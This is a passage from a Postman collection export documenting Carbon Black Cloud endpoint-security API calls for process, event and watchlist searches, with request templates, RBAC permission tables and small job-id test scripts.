(v2)","id":"8c92a761-d7d9-40bd-b9c7-1422953467e0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the results of a process search identified by a job_id. Results will be sorted based on the sort parameter specified when starting the search. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#retrieve-results-for-a-process-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","search_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>First row to use for pagination</p>\n","type":"text/plain"},"key":"start","value":"0"},{"disabled":true,"description":{"content":"<p>Number of requested rows to fetch, used for paginating requested rows</p>\n","type":"text/plain"},"key":"rows","value":"10"}],"variable":[]}},"response":[],"_postman_id":"8c92a761-d7d9-40bd-b9c7-1422953467e0"},{"name":"Cancel a Process Search (v1)","id":"1df7774c-20bb-4790-9f5e-7097edda690e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/processes/search_jobs/{{cb_job_id}}","description":"<p>Cancels the search with the given job_id so no new search results will appear.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#cancel-a-process-search-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","processes","search_jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>First row to use for pagination</p>\n","type":"text/plain"},"key":"start","value":"0"},{"disabled":true,"description":{"content":"<p>Number of requested rows to fetch, used for paginating requested rows</p>\n","type":"text/plain"},"key":"rows","value":"10"}],"variable":[]}},"response":[],"_postman_id":"1df7774c-20bb-4790-9f5e-7097edda690e"},{"name":"Start a Facet Search on Processes (v2)","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"a3ac9196-b87e-4331-88c6-660a1cb69469"}}],"id":"c664b71a-da00-4dfd-b346-e2c3d82047a3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": \"<object>\",\n    \"exclusions\": \"<object>\",\n    \"query\": \"<string>\",\n    \"ranges\": [\n        {\n            \"bucket_size\": \"<object>\",\n            \"end\": \"<object>\",\n            \"field\": \"<string>\",\n            \"start\": \"<object>\"\n        }\n    ],\n    \"terms\": {\n        \"fields\": [\n            \"<string>\"\n        ],\n        \"rows\": \"<long>\"\n    },\n    \"time_range\": {\n        \"end\": \"<string>\",\n        \"start\": \"<string>\",\n        \"window\": \"<string>\"\n    }\n}","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/facet_jobs","description":"<p>Initiates a process facet search which generates statistics indicating the relative weighting of values for the specified terms. The results for the search may be requested using the job_id returned.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#start-a-facet-search-on-processes-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","facet_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c664b71a-da00-4dfd-b346-e2c3d82047a3"},{"name":"Retrieve Results for a Process Facets Search (v2)","id":"1a060c8e-b1e6-4ff8-8861-9f4829e96fa6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/facet_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the process facet results for a given job_id. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#retrieve-results-for-a-process-facets-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","facet_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Maximum number of facets per category (i.e Any Process Search Fields listed in terms.fields)    </p>\n","type":"text/plain"},"key":"limit","value":"100"}],"variable":[]}},"response":[],"_postman_id":"1a060c8e-b1e6-4ff8-8861-9f4829e96fa6"},{"name":"Start a Details Request for Processes (v2)","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"b0f3ff36-20e6-4b37-999c-7d511f7585cc"}}],"id":"a55b78fa-8c63-49a7-9d48-f850d962741e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"process_guids\": [\n        \"{{cb_process_guid}}\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/detail_jobs","description":"<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n<p>Creates a process detail job. The details will include all available information about the given process including information that’s not returnable from the standard Process Search call. These fields are annotated with <code>DETAILS</code> on <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Platform Search Fields</a>. The results for the details search job may be requested using the job_id returned.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#request-details-of-processes-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","detail_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a55b78fa-8c63-49a7-9d48-f850d962741e"},{"name":"Retrieve Results for a Process Detail Search (v2)","id":"765f2a0f-704d-4731-ab66-b62b634d75a8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/detail_jobs/{{cb_job_id}}/results","description":"<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n<p>Retrieves the process detail results for a given job_id. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#retrieve-results-for-a-process-detail-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","detail_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"765f2a0f-704d-4731-ab66-b62b634d75a8"},{"name":"Start a Process Summary Search (v2)","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"33957aca-9b79-4866-a9d2-6a978f8e2ec3"}}],"id":"1749302a-f594-41ce-b90a-b27de28daaa0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"parent_guid\": \"<string>\",\n  \"process_guid\": \"<string>\",\n  \"time_range\": {\n      \"end\": \"<string>\",\n      \"start\": \"<string>\",\n      \"window\": \"<string>\"\n  }\n}","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/summary_jobs","description":"<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n<p>Creates a process summary job. The summary will include information about the given process including its children, parents, and siblings. The results for the search job may be requested using the job_id returned.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#start-a-process-summary-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","summary_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"1749302a-f594-41ce-b90a-b27de28daaa0"},{"name":"Retrieve Results for a Process Summary or Tree Search (v2)","id":"b1c9bcac-e807-48bf-9020-c6c48d3ef46f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/summary_jobs/{{cb_job_id}}/results","description":"<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n<p>Retrieves the process summary results for a given job_id in summary or tree format. Most callers will prefer the summary format, but you may request the tree format for convenience of building user interfaces. Confirm the search has completed by verifying that “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#retrieve-results-for-a-process-summary-or-tree-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","summary_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Options: summary or tree</p>\n","type":"text/plain"},"key":"format","value":"summary"}],"variable":[]}},"response":[],"_postman_id":"b1c9bcac-e807-48bf-9020-c6c48d3ef46f"}],"id":"7f0fff2d-6c13-4084-82da-49557e3c31ad","_postman_id":"7f0fff2d-6c13-4084-82da-49557e3c31ad","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Calls for Events","item":[{"name":"Get Suggestions for Event Searching (v1)","event":[{"listen":"test","script":{"exec":[""],"type":"text/javascript","id":"b038a52d-8a8a-4b8f-a0fc-2c4e55f22e8a"}}],"id":"4bf8ae2a-b0cd-42e6-bdcd-d7bf75c9ae2c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/events/search_suggestions?suggest.q=","description":"<p>Returns suggestions for an event search selected from fields from the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Platform Search Fields</a>. Will return field names if the “suggest.q” parameter does not yet contain a colon and will return no suggestion otherwise. This call does not support value suggestions.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-suggestions-for-event-searching-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","events","search_suggestions"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>REQUIRED: Query to generate suggestions for</p>\n","type":"text/plain"},"key":"suggest.q","value":""},{"disabled":true,"description":{"content":"<p>Number of suggestions to return</p>\n","type":"text/plain"},"key":"suggest.count","value":"50"}],"variable":[]}},"response":[],"_postman_id":"4bf8ae2a-b0cd-42e6-bdcd-d7bf75c9ae2c"},{"name":"Get Validation for Event Search (v1)","event":[{"listen":"test","script":{"exec":[""],"type":"text/javascript","id":"ebe26069-a23b-4089-b747-684b9a6c91cb"}}],"id":"daa7265b-45ac-4676-8036-1275ee52255b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/events/search_validation?q=","description":"<p>Validates a given event query and potentially gives suggestions on how to fix invalid queries.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-suggestions-for-event-searching-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","events","search_validation"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>REQUIRED: NumKeeping this parameter as <em>:</em> allows you to query everything   ber of suggestions to return</p>\n","type":"text/plain"},"key":"q","value":""},{"disabled":true,"description":{"content":"<p>Start time for the query</p>\n","type":"text/plain"},"key":"cb.min_backend_timestamp","value":"0"},{"disabled":true,"description":{"content":"<p>End time for the query</p>\n","type":"text/plain"},"key":"cb.max_backend_timestamp","value":""}],"variable":[]}},"response":[],"_postman_id":"daa7265b-45ac-4676-8036-1275ee52255b"},{"name":"Get Events Associated with a Given Process (v2)","event":[{"listen":"test","script":{"exec":[""],"type":"text/javascript","id":"5d80978e-e871-4f6d-a5b9-7a92c8a5203c"}}],"id":"e8261618-26b2-470e-87c7-71f04e2d6db7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": \"<object>\",\n    \"exclusions\": \"<object>\",\n    \"fields\": [\"<string>\", \"<string>\"],\n    \"query\": \"<string>\",\n    \"rows\": \"<long>\",\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": \"<long>\",\n    \"time_range\": {\n        \"end\": \"<string>\",\n        \"start\": \"<string>\",\n        \"window\": \"<string>\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/events/{{cb_process_guid}}/_search","description":"<p>Fetch the events associated with a given process. These events are often more complete than the enriched events but, unlike the enriched event searches, must be limited to one process at a time.</p>\n<p><em>Note: This call reports its progress as soon as it can and continues to enumerate process events in the background. To receive the full results, you must resubmit the request until p<code>rocessed_segments</code> is equal to <code>total_segments</code>.</em></p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-events-associated-with-a-given-process-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","events","{{cb_process_guid}}","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e8261618-26b2-470e-87c7-71f04e2d6db7"},{"name":"Get Events Facet Associated with a Process (v2)","event":[{"listen":"test","script":{"exec":[""],"type":"text/javascript","id":"79add78f-b027-458b-959a-c3918c75e4ec"}}],"id":"e4f122a8-91a1-47bc-9f16-2bee2cfe17ea","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": \"<object>\",\n    \"exclusions\": \"<object>\",\n    \"query\": \"<string>\",\n    \"ranges\": [\n        {\n            \"bucket_size\": \"<object>\",\n            \"end\": \"<object>\",\n            \"field\": \"<string>\",\n            \"start\": \"<object>\"\n        }\n    ],\n    \"terms\": {\n        \"fields\": [\n            \"<string>\"\n        ],\n        \"rows\": \"<long>\"\n    },\n    \"time_range\": {\n        \"end\": \"<string>\",\n        \"start\": \"<string>\",\n        \"window\": \"<string>\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/events/{{cb_process_guid}}/_search","description":"<p>Get facets for the events associated with the specified process. A facet provides statistics indicating the relative weighting of values for the specified terms.</p>\n<p><em>Note: This is an asynchronous request, you must resubmit the request until <code>processed_segments</code> is equal to <code>total_segments</code> in order to receive the full results</em></p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-events-facet-associated-with-a-process-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","events","{{cb_process_guid}}","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e4f122a8-91a1-47bc-9f16-2bee2cfe17ea"}],"id":"0cf32ce6-a06c-4849-b4d7-de70e67b36fe","_postman_id":"0cf32ce6-a06c-4849-b4d7-de70e67b36fe","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Calls using Enterprise EDR Watchlist Features","item":[{"name":"Evaluate Processes for a Watchlist (v1)","event":[{"listen":"test","script":{"exec":[""],"type":"text/javascript","id":"64307324-c416-4157-b2da-6ec8b4bacbbd"}}],"id":"cbf612a0-02c0-48d1-886b-a7db4334d0b2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"watchlist_id\": \"<string>\",\n    \"report_id\": \"<string>\",\n    \"cb.max_backend_timestamp\": \"<integer>\",\n    \"cb.min_backend_timestamp\": \"<integer>\",\n    \"ioc_id\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/processes/watchlist_evaluation","description":"<p>Instructs the Carbon Black Cloud to look for “hits” across all processes reported for the organization’s endpoints within the time range for the given watchlist, report and IOC. Watchlist hits will be available in subsequent search results asynchronously and are not guaranteed to be visible directly after this call.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#evaluate-processes-for-a-watchlist-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","processes","watchlist_evaluation"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"cbf612a0-02c0-48d1-886b-a7db4334d0b2"},{"name":"Get Report Hits (v1)","event":[{"listen":"test","script":{"exec":[""],"type":"text/javascript","id":"d2d77ab3-da88-4aa8-b353-0a82d9ea7355"}}],"id":"0785b8b5-919f-4483-81ae-e7bea97ce007","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/report_hits?process_guid=","description":"<p>Fetches report hits associated with a single process. This includes both ingress and query hits that are associated with the organization’s subscribed watchlists.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-report-hits-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud 